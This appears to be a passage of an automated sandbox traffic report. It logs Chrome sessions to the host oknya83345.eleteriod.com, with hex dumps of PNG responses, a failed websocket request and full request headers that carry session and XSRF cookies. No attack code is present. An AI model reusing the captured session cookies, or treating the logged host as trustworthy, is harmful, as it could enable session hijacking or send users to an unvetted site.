                          2024-05-22 15:57:31 UTC1369INData Raw: ef 1e b6 3d fe fe b8 49 3d 0b 0d bb 15 23 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43 fd c0 40 2e fa f5 6b da 6f df 61 a3 51 b8 88 3b
                          Data Ascii: =I=#zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC@.koaQ;
                          2024-05-22 15:57:31 UTC1369INData Raw: 83 a6 a8 5e 3b 00 b9 72 c9 6f 4f 23 5b e5 c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6 24 34 38 4a 21 5b d9 c7 a3 5e e1 e7 f3 e7 91 90
                          Data Ascii: ^;roO#[jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[$48J![^
                          2024-05-22 15:57:31 UTC1369INData Raw: 8c 18 2e 6a 7b b3 c3 33 e9 f3 67 ce 34 f9 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd be 9d 9b 34 61 02 15 e7 e7 57 0b cb 97 2f 13 ad
                          Data Ascii: .j{3g4L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m4aW/
                          2024-05-22 15:57:31 UTC1369INData Raw: 93 93 bf e2 f1 83 7b 08 bb 7c 1e 0f ee dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7 ad 10 54 37 b9 4e 64 7c 02 3a 1e 3d 86 77 59 3c
                          Data Ascii: {|FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gvT7Nd|:=wY<


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          62192.168.2.449808188.114.97.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:30 UTC1132OUTGET /ghhzdSo0pCDRNfU983q6ExVmnoJ4rBpDRip5WrwOkA7XgKsbaoTE86uM12210 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:31 UTC661INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:31 GMT
                          Content-Type: image/png
                          Content-Length: 49602
                          Connection: close
                          Content-Disposition: inline; filename="ghhzdSo0pCDRNfU983q6ExVmnoJ4rBpDRip5WrwOkA7XgKsbaoTE86uM12210"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x0en%2Bfpx5fN4%2B2BpV3%2FSPrbtpeC0rdSeU2ef0cEzd5E8ndf%2BCoX4BGhlBu7FVBHmtgI3PAxIuV%2FB8BTVvWGiEdd4WqDhJ17aiZPoOvi4ieXla%2ByRFoPKX6KVBu8ROw%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e009819f3431c-EWR
                          2024-05-22 15:57:31 UTC708INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                          Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                          2024-05-22 15:57:31 UTC1369INData Raw: b9 22 49 92 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24 49 92 24 05 db 88 b4 aa
                          Data Ascii: "I$I$I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$I$
                          2024-05-22 15:57:31 UTC1369INData Raw: fa 0d 1c 67 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0 b1 23 70 13 30 34 3a 48
                          Data Ascii: gPD$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$#p04:H
                          2024-05-22 15:57:31 UTC1369INData Raw: 5c 40 fc 39 d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24 65 b1 22 30 81 f8 c9 b4
                          Data Ascii: \@9zw$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$e"0
                          2024-05-22 15:57:31 UTC1369INData Raw: 9a 00 ec d1 f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe 9c eb 74 bd 42 6a 5c 91
                          Data Ascii: (Jr>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&tBj\
                          2024-05-22 15:57:31 UTC1369INData Raw: 75 46 e6 b1 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1 06 00 37 11 7f 7e 75 a2
                          Data Ascii: uF3j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC7~u
                          2024-05-22 15:57:31 UTC1369INData Raw: 24 49 92 24 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70 b8 fa 46 b5 bd 9d fa 3e ed
                          Data Ascii: $I$I%_OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+pF>
                          2024-05-22 15:57:31 UTC1369INData Raw: 3a 80 4a e3 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d b5 b8 0f 9c d7 c0 d1 ee 72
                          Data Ascii: :JR?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8r
                          2024-05-22 15:57:31 UTC158INData Raw: e5 1d 1e 75 a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31
                          Data Ascii: ue&w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1
                          2024-05-22 15:57:31 UTC1369INData Raw: 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd 00 dc 0c 7c 9b b4 ad dc ba a4 e6 82 0f 00 97 52 bd 15 f4 aa 60 14 69 6c eb f2 3a 8f 24 49 92 24 45 fb 1c f0 3b d2 d6 de bf 63 29 77 82 a8 5a 07 d9 b5 cd 8e 8a 0a b3 3b f1 e7 43 ae 7a 09 9f 32 51 eb 56 01 7e 44 6b e7 de 4d 40 4f e7 23 ab 1f 9b 11 ff b5 a8 d9 7a 43 21 23 a1 48 db e1 2a 0a ad d4 33 a4 c6 85 11 cd 0f 79 2d f5 02 ef c1 95 5c 5a ad ef 35 3f e4 92 02 8c 25 fe eb 45 11 e5 0a 1c 4b af 07 78 3d 69 5b d7 87 89 3f 76 75 aa a3 9a 38 0e 92 a4 6a 70 05 0e a9 79 55 9b 3f 5d 52 b9 02 87 b4 68 45
                          Data Ascii: :p"Z$<a`CiURUtl&JL*`S_MTm_%MJ|R`il:$I$E;c)wZ;Cz2QV~DkM@O#zC!#H*3y-\Z5?%EKx=i[?vu8jpyU?]RhE


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          63192.168.2.449809188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:30 UTC1301OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: Upgrade
                          Pragma: no-cache
                          Cache-Control: no-cache
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Upgrade: websocket
                          Origin: https://oknya83345.eleteriod.com
                          Sec-WebSocket-Version: 13
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          Sec-WebSocket-Key: PyHf1aJAyG0MljaciK7lZQ==
                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                          2024-05-22 15:57:31 UTC589INHTTP/1.1 400 Bad Request
                          Date: Wed, 22 May 2024 15:57:31 GMT
                          Content-Type: application/json
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V1arIhHnjs2I4gnrRrrw2i6rCCkrQh9Gpa9PwRCNiyvifg4M6%2BS%2FAiZdYizadVSp%2FijsAVOhPIb7yslZRpHIWHF9A6pJFnK1f8i0R2vnSZFq2Kn5MPai9hI%2FyuBcf4i3vIoROWFp966XgSY%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 887e00985b00437f-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:57:31 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                          Data Ascii: 22{"code":3,"message":"Bad request"}
                          2024-05-22 15:57:31 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          64192.168.2.449810188.114.97.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:30 UTC1142OUTGET /stFVFVBLRUZEe4WD3anWY2WwTjYsy9M2yanojV67aWExa5cPBbBIYHvasqNUwXwEuYef256 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:31 UTC663INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:31 GMT
                          Content-Type: image/png
                          Content-Length: 70712
                          Connection: close
                          Content-Disposition: inline; filename="stFVFVBLRUZEe4WD3anWY2WwTjYsy9M2yanojV67aWExa5cPBbBIYHvasqNUwXwEuYef256"
                          CF-Cache-Status: DYNAMIC
